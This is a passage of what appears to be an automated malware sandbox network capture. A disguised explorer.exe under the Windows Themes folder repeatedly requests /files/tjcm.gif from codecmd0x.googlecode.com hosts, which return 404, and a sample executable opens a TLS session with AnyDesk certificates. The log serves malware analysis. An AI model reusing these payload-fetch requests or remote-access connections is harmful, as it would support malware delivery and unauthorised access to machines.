6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                                                                                                                Jul 16, 2022 23:58:20.308283091 CEST2725INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                32192.168.2.549888142.250.102.8280C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Jul 16, 2022 23:58:21.579205036 CEST2729OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd03.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Jul 16, 2022 23:58:21.605839014 CEST2734INHTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:58:21 GMT
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                                                                                                                Jul 16, 2022 23:58:21.605854034 CEST2735INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                33192.168.2.54989092.223.88.4180C:\Users\user\Desktop\sj9q8uwmax.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Jul 16, 2022 23:58:25.439656973 CEST2740OUTData Raw: 16 03 01 01 0c 01 00 01 08 03 03 77 04 04 b4 48 0b 26 41 a0 22 37 0a d1 da 90 7c 1a ea cf e7 7f 96 78 3c f4 25 e0 b7 eb 2f d2 9e 00 00 6e c0 30 c0 2c c0 28 c0 24 c0 14 c0 0a 00 a5 00 a3 00 a1 00 9f 00 6b 00 6a 00 69 00 68 00 39 00 38 00 37 00 36
                                                                                                                                                                                Data Ascii: wH&A"7|x<%/n0,($kjih98762.*&=5/+'#g@?>32101-)%</q#
                                                                                                                                                                                Jul 16, 2022 23:58:25.470498085 CEST2742INData Raw: 16 03 03 00 57 02 00 00 53 03 03 62 d3 34 81 81 e8 36 18 54 46 5a eb 8b 88 9e 6e 1c 6d 39 e1 8c 29 fe ce 44 4f 57 4e 47 52 44 01 20 bc 1c d1 ef ed 28 68 db 4a 74 63 f1 a6 7b 61 81 61 1d 5a f0 bb 6c 10 45 12 b5 cf ab 5f 73 e8 69 c0 2c 00 00 0b ff
                                                                                                                                                                                Data Ascii: WSb46TFZnm9)DOWNGRD (hJtc{aaZlE_si,C0?0'0vtS$0*H0H10UAnyNet Root CA1 0Uphilandro Software GmbH10UDE0181118021423Z281115021
                                                                                                                                                                                Jul 16, 2022 23:58:25.470537901 CEST2743INData Raw: e0 cd 68 3b 6a 87 6c a6 0d e7 d8 bd 61 df 56 6b 2a e1 1c 2b f5 9f bf 85 dd 8c 5b 06 1e 71 7f ba 4a a6 40 b0 77 17 ea 2c 3f 5b 94 14 85 2e ad 11 61 ab 88 f6 01 bb b3 47 6b e2 81 18 f1 8e 39 e6 d8 7b 0c 63 86 83 ac 70 84 75 27 2d 35 3d 7b 7b a8 ce
                                                                                                                                                                                Data Ascii: h;jlaVk*+[qJ@w,?[.aGk9{cpu'-5={{Hy8-&~K2vf/bj@kXScuxI#ph3/L^}a}4AkP+g_R4gs@lo67Jv"rR}uMU#[~.K_eCL/3
                                                                                                                                                                                Jul 16, 2022 23:58:25.494404078 CEST2744OUTData Raw: 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30 82 02 a8 30 82 01 90 02 01 01 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 19 31 17 30 15 06 03 55 04 03 0c 0e 41 6e 79 44 65 73 6b 20 43 6c 69 65 6e 74 30 20 17 0d 32 32 30 37 31 37 30 36 35 37
                                                                                                                                                                                Data Ascii: 000*H010UAnyDesk Client0 220717065706Z20720704065706Z010UAnyDesk Client0"0*H0uaq4_8[_|_,zN+i/q)NU*E:uFQ[Z+
                                                                                                                                                                                Jul 16, 2022 23:58:25.529814959 CEST2744INData Raw: 15 03 03 00 02 02 2d
                                                                                                                                                                                Data Ascii: -


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                34192.168.2.549892142.250.102.8280C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Jul 16, 2022 23:58:27.798254967 CEST2750OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd01.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Jul 16, 2022 23:58:27.825057983 CEST2751INHTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:58:27 GMT
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                                                                                                                Jul 16, 2022 23:58:27.825083971 CEST2751INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                35192.168.2.549896142.250.102.8280C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Jul 16, 2022 23:58:31.401536942 CEST2765OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd02.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Jul 16, 2022 23:58:31.428580046 CEST2766INHTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:58:31 GMT
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
